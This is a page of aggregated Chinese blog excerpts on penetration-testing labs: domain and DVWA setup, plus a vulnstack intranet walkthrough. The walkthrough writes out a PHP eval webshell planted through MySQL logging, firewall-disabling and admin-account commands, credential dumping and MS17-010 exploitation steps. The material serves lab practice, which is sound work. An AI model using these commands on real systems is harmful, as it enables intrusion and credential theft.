精华内容
下载资源
问答
  • 内网渗透环境搭建

    千次阅读 2020-06-11 16:05:28
    内网渗透 内网渗透测试,其实很大程度上是域渗透测试。 常见的内网环境一般是(Windows server2003-2019、Windows7) 内网搭建所需环境 Windows server 2012 R2 标准版 Windows server 2008 R2 标准版 Windows 7 ...

    内网渗透
    内网渗透测试,其实很大程度上是域渗透测试。
    常见的内网环境一般是(Windows server2003-2019、Windows7)

    内网搭建所需环境
    Windows server 2012 R2 标准版
    Windows server 2008 R2 标准版
    Windows 7 旗舰版

    环境配置
    Windows server2012 配置
    配置内网IP地址为192.168.1.1.
    在这里插入图片描述
    配置计算机名
    在这里插入图片描述
    添加域服务和DNS服务
    点击添加角色和功能勾选添加“Active Directory域服务”和“DNS服务器”
    在这里插入图片描述
    在这里插入图片描述
    如果不小心点击了关闭可以在服务器管理器中找到带有“!”的按钮,选择“将此服务器升为域控制器”配置根域名。
    在这里插入图片描述
    设置DSRM密码
    在这里插入图片描述
    继续下一步。
    在这里插入图片描述
    下一步
    在这里插入图片描述
    默认下一步
    在这里插入图片描述
    点击安装
    在这里插入图片描述
    我们看已经添加了AD DS域服务和DNS服务了
    在这里插入图片描述
    为Windows7添加域控制器账户,点击“工具”-选择“Active Directory”,右击选择Users
    在这里插入图片描述
    在这里插入图片描述
    设置Windows7地址为192.168.1.2 DNS为192.168.1.1,ping yang.net通过
    在这里插入图片描述
    将win7计算机名改为win7-test添加域yang.net.
    在这里插入图片描述
    输入域管理员用户密码
    这里登陆刚刚创建的testuser
    在这里插入图片描述
    在这里插入图片描述
    参考学习自徐炎老师的《内网安全攻防:渗透测试实战指南》

    https://www.ms08067.com/book.html

    展开全文
  • web渗透环境搭建

    2019-09-24 14:35:39
    一、为什么要搭建环境?  为了更好的模拟黑客攻击,为专业的安全测试人员提供合法的环境。 二、搭建DVWA网站 1、名词翻译:  Damn Vulnerable Web Application(DVWA): 可恶的易受攻击的web应用程序 2、...

    一、为什么要搭建环境?

       为了更好的模拟黑客攻击,为专业的安全测试人员提供合法的环境。

    二、搭建DVWA网站

    1、名词翻译:

      Damn Vulnerable Web Application(DVWA): 可恶的易受攻击的web应用程序

    2、名词解释:

      是一个用来进行安全脆弱性鉴定的PHP/Mysql 的web应用,旨在为安全人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。

    3、搭建网站

      a.安装集成环境:phpstudy

        a.1: 先解压phpstudy,双击运行程序。

        

     

     

        a.2:phpstudy的默认安装路径是D盘,可以修改。

        

        a.3:这里选择“是”

        

        a.4:选择允许访问。

        

        a.5: 安装成功,下图是phpstudy的启动界面。

        

      b、安装数据库

        b.1: 打开phpstudy的安装路径,可以看到里面有很多环境(apache,IIS,MySQL,php等)。将DVWA-master放在下面www文件路径下。

        

        b.2: 查看配置文件,以记事本的方式打开。

        

        b.3:查看配置文件,IP,数据库名称,用户名,密码等。

        

        b.4 创建数据库。运行phpstudy,点击->其他选项菜单->MySQL工具->快速创建数据库。

        

     

        b.5 输入数据库名称,点击确定。这样一个数据库就快速创建好了。

        

        

      c.php设置

         c.1 点击允许目录列表

        

        c.2 浏览器中输入本机ip,查看,相当于把www里面的目录文件列出来了。

        

     

     

     

         c.3  点开第一个目录,输入admin/admin 点击登录。

        

        c.4 初始化导入数据。

        

        c.5  登录数据库查看,已经自动导入好了数据。

        

     

     ----------------------------------------------------我是分割线-------------------------------------------

    整个DVWA的环境搭建就完成啦!

     

    转载于:https://www.cnblogs.com/startingpoint-fly/p/10978753.html

    展开全文
  • 搭建vulnstack靶场环境 主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 这次...

    一.搭建vulnstack靶场环境
    主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址:
    http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
    请添加图片描述
    这次靶场一共三个环境,win7,win2003,win2008,win7是web服务器,上面我们需要两张网卡,一张nat模式,一张主机模式,win2003是域成员,win2008为域控
    Win7配置如下:
    请添加图片描述
    在win7中使用phpstudy开启环境,然后在win7中ping各主机,保持各个主机之间能够互相访问,在自己的攻击机中能访问到win7的网站页面。至此,环境已经搭建完毕。

    二.官方提供的流程
    环境官方有提供相关的渗透流程为:
    一、环境搭建
    1.环境搭建测试
    2.信息收集
    二、漏洞利用
    3.漏洞搜索与利用
    4.后台Getshell上传技巧
    5.系统信息收集
    6.主机密码收集
    三、内网搜集
    7.内网–继续信息收集
    8.内网攻击姿势–信息泄露
    9.内网攻击姿势-MS08-067
    10.内网攻击姿势-SMB远程桌面口令猜测
    11.内网攻击姿势-Oracle数据库TNS服务漏洞
    12.内网攻击姿势-RPC DCOM服务漏洞

    四、横向移动
    13.内网其它主机端口-文件读取
    14.内网其它主机端口-redis
    15.内网其它主机端口-redis Getshell
    16.内网其它主机端口-MySQL数据库
    17.内网其它主机端口-MySQL提权
    五、构建通道
    18.内网其它主机端口-代理转发
    六、持久控制
    19.域渗透-域成员信息收集
    20.域渗透-基础服务弱口令探测及深度利用之powershell
    21.域渗透-横向移动[wmi利用]
    22.域渗透-C2命令执行
    23.域渗透-利用DomainFronting实现对beacon的深度隐藏
    24.域渗透-域控实现与利用
    七、痕迹清理
    25、日志清理

    三.开始内网渗透
    1.我们开始初步的步骤,先进行信息收集
    暴露在外网的是win7的web服务,ip地址为192.168.137.130,先用nmap和dirsearch对其进行操作系统,端口版本信息,目录进行扫描,
    请添加图片描述
    请添加图片描述

    2.根据收集到的信息渗透web服务器
    我们可以看到端口就开放了80,3306,操作系统版本为win系列低版本,目录的话扫描出了网站备份,phpstudy的探针和phpmyadmin页面(其实我最后看大佬们的攻略,应该有一个yxcms的cms目录的,但是我的字典太垃圾了,没有扫到),接下来就是三个目标了,一是下载beifen.rar文件然后开始查看网站构成,二是登陆phpmyadmin,爆破账号密码查看数据库,三是用nmap扫描对方有没有相应的win系列低版本漏洞,我们就一边下载网站备份文件进行查看,一边爆破phpmyadmin的账号密码。
    打开网站的备份文件,发现是一个名为yxcms的源码,应该确认网站应该是有yxcms搭成的网页,另外查看config文件,数据库的账号密码已经获得,同时我们得知版本应为1.2.1我们再在url中查看/yxcms,进入网站我们可以看到首页如下:
    请添加图片描述
    现在我们有三条路,一是按照版本为1.2.1的yxcms找它相关的漏洞获取权限,二是走phpmyadmin写入一句话获取权限,三是用nmap扫描目标是否有系统漏洞,我们先走第一条路试一试。

    (1)1.2.1 yxcms
    打开默认管理员登陆得后台yxcms/index.php?r=admin/index/login,使用默认账号密码admin 123456进行登陆,登陆成功,在后台的前台模板中有一个上传php的功能
    请添加图片描述

    我们上传一个一句话木马进行尝试,不过在上传过程中抓包没有回显上传后的地址,幸亏我们有网站备份,在中间搜索这些前台模板所在文件地址,发现地址为yxcms\protected\apps\default\view\default\123.php,所以我们尝试连接一句话木马,连接成功,下来查看ipconfig,发现这台电脑有两个网段,可能是一个内网网段,一个外网地址
    请添加图片描述

    (2)通过phpmyadmin获得webshell
    通过爆破,发现phpmyadmin的账号密码为root root,登陆之后先查看是否有写入权限,show VARIABLES like ‘%secure%’
    请添加图片描述

    当我们查看mysql中的 secure_file_priv参数时,发现它的默认值是NULL,表示限制不能导入导出,当我们进行修改的时候就会报错,因为secure_file_priv参数是一个只读参数,不能通过set global命令修改,这表示我们不能直接outfile写入一句话了,我们尝试利用日志写入一句话木马,我们执行sql语句show global variables like ‘%general%’,查看日志功能的情况
    请添加图片描述

    日志功能是关闭的,我们打开它set global general_log=‘ON’,然后将日志文件的存放位置修改为当前网站的根目录(根据刚才的那个phpstudy探针显示的地址),执行sql语句set global general_log_file = ‘C:/phpStudy/WWW/123.php’,然后我们再使用show global variables like ‘%general%‘查看,发现都已经设置好
    请添加图片描述
    下来就是执行一句话木马,让日志记录下来
    select’<?php @eval($_POST["123"]); ?>’
    请添加图片描述
    发现执行成功,我们用蚁剑进行连接,连接成功,发现是有一个内网地址和一个外网地址
    请添加图片描述

    (3)直接通过系统版本漏洞进行攻击
    我们通过刚开始的nmap扫描和phpstudy的探针,已经确定对方的web服务器为win7,我们就从win7的操作系统漏洞入手查看对方是否拥有,结果不出所料,对方只开启了80和3306,其他类似445,3389的端口都没开启,没办法了,思路一条(如果大佬们有其他办法,可以一起讨论讨论),这条路走不通
    总结:在渗透这台web服务器的过程中,只有两条路走的通,一条就是通过cms的漏洞,上传一句话木马文件获得webshell,另一个就是通过phpmyadmin写入webshell,系统漏洞方面暂时没有更好的想法,这就是从外网进入内网的一步。
    3.从web服务器到内网拿到域控
    现在web服务器已经到了我们手中,接下来要做的就是从web服务器横向移动拿到这个内网的域控了,不过现在我们是在用冰蝎进行连接,有点不舒服,我们直接用冰蝎的反弹shell功能直接把会话转到我们攻击机的Linux的msf上。
    请添加图片描述
    请添加图片描述
    但是效果有点不好,在进行shell操作的时候会话容易直接死掉,我们再通过冰蝎上传一个msf的exe木马,效果非常好,感觉刚才那个php的反弹shell跟假的一样,下来我们就开始内网渗透。
    在刚开始的信息收集中我们知道win7机器只开启了80和3306,我们先开启他的3389端口,使用run getgui -e
    请添加图片描述

    下来进入shell模式中(在进入shell模式有乱码现象,输入chcp 65001即可),我们可以通过netstat -an可以看到3389已经处于listening状态了,我们进入之后是administrator权限,先不进行提权,开启3389过程中我们也要创一个自己的账户啊,留一后手,先创建一个账户test,net user test Admin123 /add,然后把test账号添加到当地administrator组里面,net localgroup administrators test /add,这就已经创建好了,我们可以远程登录看看。
    请添加图片描述

    登录成功,下来我们就是收集当前机器的信息。
    请添加图片描述

    可以看到当前的机器是存在一个名为god.org的域内的,在确定已经是一个域用户之后,然后我们使用msf的getsystem提下权
    请添加图片描述

    我们可以看到已经提到system权限了,下来直接加载minikatz抓取这台机器的账号密码,使用load kiwi加载猕猴桃

    请添加图片描述

    在此之间记得迁移进程,然后使用credes_all抓取所有密码
    请添加图片描述

    当前的明文密码已经抓取到了(administrator的密码我打了一下马赛克),然后查看防火墙状况netsh firewall show state,并使用netsh advfirewall set allprofiles state off关掉防火墙
    请添加图片描述

    使用net view确定域内的计算机
    请添加图片描述

    我们使用net time /domain来确定域控主机
    请添加图片描述

    我们已经知道了域控主机为owa,然后开始横向渗透,先自动创建路由run post/multi/manage/autoroute
    请添加图片描述

    把当前会话挂起来,通过post/multi/manage/autoroute这个模块查看路由表,并指定session为刚才的会话
    请添加图片描述
    请添加图片描述

    然后我们使用auxiliary/server/socks_proxy这个模块开启socks代理,设置我们自己的服务器ip和端口,运行
    请添加图片描述

    下来我们使用msf自带的扫描模块use auxiliary/scanner/netbios/nbname来扫描192.168.52.0/24这个网段,查看存活主机
    请添加图片描述

    成功发现三台,一台就是我们刚才攻陷的web服务器STU1,另外我们已经在刚才的信息收集当中知道了域控的名字为OWA,所以我们下来的主要目标就是域控了,他的ip地址为192.168.52.138,下来我们对其端口进行详细的扫描,使用msf的扫描端口模块,use auxiliary/scanner/postscan/tcp,扫描对应的端口
    请添加图片描述

    扫描过程中看到了445,立马兴奋了起来,先使用大家最熟悉的永恒之蓝扫一波,看看有没有
    请添加图片描述

    发现有,我们打一波试一试,不过在这里我们需要注意一下,因为我们现在挂着有socks代理,所以我们不能使用反向链接了,需要正向的。
    请添加图片描述
    请添加图片描述

    最后没有成功,推测应该是开启了防火墙,我们先使用command执行关闭防火墙指令,然后在用永恒之蓝攻击试试看,结果失败,不过我们还可以使用ms17_010command漏洞执行命令,在关闭防火墙的基础上,我们添加用户账号,添加到administraror组里面,先远控win7机器,再远控域控
    请添加图片描述
    请添加图片描述

    已经可以看到这已经添加成功了,然后我们打开3389端口set command REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 这是因为msf里面的引号需要转义,原命令为REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
    请添加图片描述

    这已经开启成功了,然后我们就先远控win7,然后再用win7远控域控
    请添加图片描述

    成功了,不过中间我用linux攻击机直接开代理远控能连接到,但是账号密码总不对,有点搞不懂,其实还有另一个办法,就是直接用wmi,psexec等工具直接使用账号密码横向移动,不过那个就先不搞了,想测试的就是在不知道密码的账号下进行内网渗透,这一套流程走下来,感觉官方的流程好强啊,下来可以再学学别的大佬都是怎么过这个靶场的

    展开全文
  • AJE-Windows渗透环境

    千次阅读 2020-04-14 18:39:34
    Hello,今天给大家分享由AJE团队搭建好的渗透环境,AJE Windows,这款渗透环境是Windows的发行版,集成了各种重量级安全工具和常用的安全工具,以及搭建者收集觉得好用的工具。 镜像下载链接: ...

    Hello,今天给大家分享由AJE团队搭建好的渗透环境,AJE Windows,这款渗透环境是Windows的发行版,集成了各种重量级安全工具和常用的安全工具,以及搭建者收集觉得好用的工具。

    镜像下载链接:

    https://pan.baidu.com/s/1x0HUJzpjViDzifmeCIbeUw 提取码:967D

    里面有解压密码,下载好镜像后把两个压缩包解压到同一个文件夹里面,然后打开VMwar击打开虚拟机—>选择刚刚下载的AJEWindows7安全镜像文件直接打开虚拟机—>然后进去之后输入开机密码(刚刚在网盘下载的文件里面有)进入了桌面,就可以开始你的表演了,不会用虚拟机的去Google或者百度搜VMware使用教程,接下来给大家看看效果
    在这里插入图片描述

    在这里插入图片描述
    完美的你,仅缺一个配的上你的AJE Windows,本人现在也在用着,感觉比一些其它的渗透环境用的顺手,强烈推荐用这款AJE Windows,有哪里要反馈的可以在AJE团队官网反馈http://www.hacker-aje.cn

    AJE-Windows渗透环境仅供于合法渗透测试,用于违法行为概不负责
    转载请挂上原文链接:https://www.sakuar.cn/aje-windows/

    展开全文
  • web渗透环境WebGoat和DVWA,详情见https://blog.csdn.net/qq_32261191/article/details/80338091和https://blog.csdn.net/qq_32261191/article/details/80793823
  • 靶机综合渗透环境——zico2渗透实战
  • dvwa分为几个安全等级,是一个非常棒的渗透环境,,只需要一个phpstudy,DVWA全级别中文渗透教程和渗透环境,最强大没有之一。初学web安全的可以来下载
  • 探究中学美术如何渗透环境意识.docx
  • 物理教学中渗透环境保护知识.pdf
  • 目前,虽然C/S客户端不如Web应用程序常见,但是在银行及某些企业也经常能够遇到C/S架构的渗透测试。本系列文章将带大家搭建CS客户端渗透测试环境并介绍一些常用工具的使用。C/S客户端介...
  • 生物教学渗透环境教育计划[定义].pdf
  • APP渗透drozer工具包,包含adb安卓调试桥,adb_interface_usb_driver,drozer-agent-2.3.4.apk,Twisted-19.2.0-cp27-cp27m-win32.whl,drozer-2.4.4.win32,VM虚拟机上win7.64系统通过这些包可搭建一套drozer渗透环境
  • 在小学数学教学实践中渗透环境保护教育.doc
  • 在小学语文教学中有效渗透环境教育省级3.doc
  • 各学科渗透环境知识教学结合点-首页-东莞教育网.doc
  • 渗透环境搭建

    千次阅读 2020-01-24 21:21:54
    内网环境搭建@4ut15m 搭建域环境 配置一台Windows Servers 2012 R2为域控服务器,并将一台Windows 7和一台Windows Server 8 R2加入该域. 系统 IP Windows Server 2012 R2 192.168.1.1 Windows Server ...
  • 系统 :windows 2003 step1:"开始 "----"控制面板"----"添加或删除程序"----"应用程序服务器"----"Internet信息服务"----"文件传输协议"----确定 step2:一路安装下去就可以了 ...step3:“开始”----“管理工具...
  • 关于渗透环境以及渗透工具的使用

    千次阅读 2016-08-09 15:19:20
    本次实验测试的主要目的为熟悉Web渗透工具的使用,漏洞的利用及了解渗透测试流程。 测试流程为 信息搜集-网络与主机扫描-漏洞利用-攒写报告 (2)实验测试范围 局域网192.168.0.0 网段中的DVWA主机和MSF...
  • 内网渗透之域环境渗透测试过程

    千次阅读 2019-06-28 13:15:44
    【申明:此次渗透环境为实验环境,仅供渗透实验参考】 【实验目的】 拿到域环境下其他主机的网站源码 【渗透思路】 通过拿到网站shell渗透到内网,由内网存活主机拿到域控权限,再由域控渗透到其他域里面得主机获取...
  • XAMPP集成环境里面MYSQL的默认登陆密码为root/root,请根据实际情况修改。 第六步:开启Apache,mysql 第七步:通过浏览器访问dvwa所在主机访问的地址为 http://127.0.0.1/dvwa 进入dvwa的web安装界面见下...
  • Centos6.5中搭建WEB渗透环境DVWA渗透测试环境 搭建前的准备 1.1 修改系统网卡配置,保证外网联通性 搭建DAWA渗透测试环境应该搭建在虚拟机中,所以应该事先先在VMware-Station中安装一个Centos虚拟机。这里我选择...
  • 如果想要了解系统的安全状况,那么可以进行渗透测试,找出系统中的漏洞,验证是否存在安全隐患。 渗透测试的含义不只是评估,它会用已发现的漏洞来进行测试,以验证该漏洞是真实存在还是只是虚惊一场(假阳性)。举...
  • 内网渗透-域环境搭建

    2020-06-26 21:31:38
    服务器:Windows-server2016,下载地址 个人机:Windows10,下载地址 安装步骤(看图操作): 设置本机IP为静态IP 开始AD服务安装 ...进到服务关管理器内,选择添加角色和功能 ...这里我只选择了AD域服务,待会安装...
  • [SQL注入练习]K8-ASP渗透环境[K8team].rar
  • Lazysysadmin靶机下载地址: 链接:https://pan.baidu.com/s/1BGpLkrEgsKwjRPgN0oUPUA 提取码:qxw6 系统 :linux setp1:下载“Oracle VM VirtualBox”...接下来就可以在局域网中进行渗透靶机了。 后续WP会继续更新。
  • 部署mac os渗透测试环境

    千次阅读 2020-04-24 17:55:06
    每次重装系统后配置环境都是需要耗费大量时间,特此写一篇mac os部署渗透测试环境 二、过程 (一)系统设置 1.常用设置 ①SSD 开启 TRIM 支持 sudo trimforce enable ②APP安装开启任何来源 sudo spctl --master-...
  • Kali渗透测试之实验环境搭建

    千次阅读 2019-06-04 20:27:02
    自己搭建实验环境既安全又利于学习 虚拟机平台 模拟真实网络 防火墙 M0n0wall防火墙 学会设置M0n0wall防火墙 常用防火墙 背靠背防火墙 Pfsense 有waf和防病毒,安全措施比较多 ...
  • 内网域环境渗透

    千次阅读 2019-06-20 20:50:44
    环境渗透 辨别当前用户是本地用户还是域用户? 本地用户 域用户 域信息收集 查询域控的主机名 定位域管理员 查找域管理员进程 模拟域管理员 内网横向渗透 域信息获取(NTDS.dit) 权限维持 当我们通过...
  • Ubuntu搭建渗透测试环境

    千次阅读 2020-07-23 19:43:03
    sudo apt install tlp tlp-rdw 14、Firejail沙箱 sudo apt install firejail 15、Chrome浏览器 0x02 渗透测试工具 1、添加kali源和数字签名 #添加kali源,将下面两行写入该文件 sudo vim /etc/apt/sources.list deb ...
  • 搭建渗透测试环境

    千次阅读 2018-08-10 08:53:16
    今天一上午都在web安全测试平台上学习,今天决定把测试环境搭建过程写下来。我在Windows系统和Linux系统都搭建了测试平台,我把两个搭建过程都写下来,以便其他人的学习。 注意:不管在什么系统下搭建测试平台,都...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 55,355
精华内容 22,142
关键字:

渗透环境